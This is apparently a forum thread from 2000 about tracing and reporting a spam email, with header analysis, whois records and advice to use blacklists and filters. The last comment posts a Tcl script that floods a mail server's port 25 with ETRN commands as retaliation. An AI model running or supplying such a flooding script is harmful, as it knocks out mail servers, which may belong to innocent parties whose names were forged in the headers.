When Does Spam Equal "Denial of Service"? 8
"Here is a sample header (with my email adress DELETED):
From - Sat Jul 1 10:11:08 2000
Return-Path:(DELETED)
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com
(InterMail vM.4.01.03.00 201-229-121) with ESMTP id
for (DELETED)
Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29])
by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694
for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net
(mx04.netaddress.usa.net [204.68.24.141])
by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861
for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01)
with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174])
by gsnonweb.com with Microsoft SMTPSVC(5.5.1877.197.19);
Sat, 1 Jul 2000 10:29:50 +0300
X-Mailer: Microsoft Outlook Express 5.00.2014.211
Date: Sat, 01 Jul 2000 00:30:14 -0800
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: 7BIT
From: auto65686@hushmail.com
Message-Id:
Subject: You are invited to join our private club!
To: buddapest@LoadMail.com
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: "
Try this... (Score:3)
Try joining the MAPS Realtime Blacklist [mail-abuse.org] of spammers.
Report the sites listed in the headers to ORBS [orbs.org]. If they have open mail relays, ORBS will log them in its database and send a notification to the postmaster. Mail relays which support ORBS will not relay mail coming from unsecured hosts. If the sites are clean, no harm done, ORBS will not flag them.
Finally, you can always work up a procmail script to filter out most spam. Sure, it doesn't keep spammers from using your network resources, but if everyone did it, spamming would be a lot less profitable.
Hope this helps
Only one question.... (Score:1)
5 days?
If it's more than 6 folks.. you might as well
start armoring your system from this kinda stuff.
Some people are screaming targets on the web.
You just got zapped.
File Suit (Score:1)
-----------------------------
Re:File Suit (Score:1)
Please don't just fire mail off to every domain! (Score:2)
Sites like http://www.spamcop.com/, or http://www.spamwatcher.com/ (which I'm in the process of setting up now--don't expect much) will help you track the sender, and who to report the problem to. You want to complain to the ISP where the spam originated. You want to complain to the hosting provider of any URLs mentioned. You want to send a warning note to the relay, telling them that their mailer is misconfigured. The rest of the addresses should be ignored.
These headers are nearly always forged:
To: buddapest@LoadMail.com
From: auto65686@hushmail.com
Message-ID:
The key is to look at the received headers. They track the
message as it goes from one machine to the next. Most, but not
all, mail servers record the IP address of the sending machine,
and there is no way to forge that. So the goal is to find the
first real machine to receive the email, and see where it got the
mail from. That machine will typically either be one of yours,
or it will be some (idiot) machine which left its mail software
open for others to use as a relay. In the latter case, it's worth
notify the that company, as well as the originating ISP.
Here are the Received headers in order:
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id for (DELETED) Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29]) by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694 for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net (mx04.netaddress.usa.net [204.68.24.141]) by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861 for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Couldn't parse (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000.
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01) with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174]) by gsnonweb.com with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 1 Jul 2000 10:29:50 +0300
If we ignore the forgeable names, that makes a chain, and for
element in the chain we can look it up and make sure that the
chain makes sense.
From: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
To: gsnonweb.com (194.90.1.6)
From: 194.90.101.35 (gsnews.gsnonweb.com)
To: mx04 via mtad (34FM1.5.01) (Unknown)
From: 204.68.24.141 (mx04.netaddress.usa.net)
To: mx11-rwc.mail.home.com (24.0.95.29)
From: 24.0.95.29 (mx11-rwc.mail.home.com)
To: h11.mail.home.com (24.0.95.45)
From: 24.0.95.45 (h11.mail.home.com)
To: mail.rdc2.pa.home.com (24.12.106.196)
So the spammer probably sent from 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net).
And gsnonweb.com (194.90.1.6) is probably a system with an open relay.
Here is information on the ISP that owns the domains in question.
Spammer: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
Ziplink Inc. (NETBLK-NET-ZIPLINK2)
900 Chelmsford St., Tower 1, 5th Floor
Lowell, MA 01851
US
Netname: NET-ZIPLINK2
Netblock: 216.8.0.0 - 216.8.63.255
Maintainer: ZIPL
Coordinator:
Clampitt, Dustin (DC35-ARIN) dclampitt@ZIPLINK.NET
978 551 8602 (FAX) 978 970 0358
Domain System inverse mapping provided by:
PICNIC.ZIPLINK.NET 206.15.168.65
TITANIC.ZIPLINK.NET 206.15.168.70
Record last updated on 16-Nov-1999.
Database last updated on 14-Jul-2000 18:30:27 EDT.
The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.
Relay: gsnonweb.com (194.90.1.6)
inetnum: 194.90.0.0 - 194.90.6.255
netname: NVNET1
descr: NetVision Ltd.
descr: ISP
descr: Local Networks
country: IL
admin-c: NN105-RIPE
tech-c: NN105-RIPE
status: ASSIGNED PA
mnt-by: NV-MNT-RIPE
mnt-lower: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990413
source: RIPE
route: 194.90.0.0/16
descr: Netvision
descr: Omega Bldg.
descr: MATAM industrial park
descr: Haifa 31905
descr: Israel
origin: AS1680
advisory: AS690 1:1239 2:3561 3:6453
mnt-by: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990902
source: RIPE
role: Netvision NOC team
address: Omega Building
address: MATAM industrial park
address: Haifa 31905
address: Israel
phone: +972 48 560 600
fax-no: +972 48 551 132
e-mail: noc-team@netvision.net.il
trouble: Send abuse and spam reports to abuse@netvision.net.il
admin-c: YG-RIPE
admin-c: YS-RIPE
admin-c: NNT-RIPE
tech-c: YG-RIPE
tech-c: YS-RIPE
tech-c: NNT-RIPE
tech-c: WAN-RIPE
nic-hdl: NN105-RIPE
notify: noc-team@netvision.net.il
notify: hm-dbm-msgs@ripe.net
mnt-by: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990505
changed: noc-team@netvision.net.il 20000315
changed: noc-team@netvision.net.il 20000525
changed: noc-team@netvision.net.il 20000531
source: RIPE
Couldn't you just.... (Score:1)
Rich
BAD idea (Score:1)
Company A spams you, but forges the headers and makes it look like Company C is spamming you.
You (failing to realize that Company A is the real culprit) retaliate against Company C.
Guess who is liable for the damages to Company C? (hint: you are)
Even more fun is if their system has an auto-responder. You bounce to them, they bounce to you, bounce to them, bounce to you, bounce to them and so on.
DOS them (Score:1)
It took Anticlan.com's ftp server down. Ya, it
hits HARD. Hangs the mail server sending it.
Works on sendmail, and most others. This is for
anyone having trouble with spammers. Save this
in file and do 'tcl file', or 'tclsh file'.
--------------------CUT HERE------------------
set flood_count 2000
set curr_count 30
proc do_port { host port } {
puts stdout "Flooding $host:$port
if {![catch {socket $host $port} sockfd]} {
puts stdout "CONNECTED.. "
puts stdout "SENDING SHIT.. "
puts $sockfd "ETRN x"
puts stdout "DONE!"
} else {
puts stdout "FAILED."
}
}
while {$curr_count < $flood_count} {
set curr_count [expr $curr_count + 1]
do_port server 25
}
----------------UNCUT HERE------------------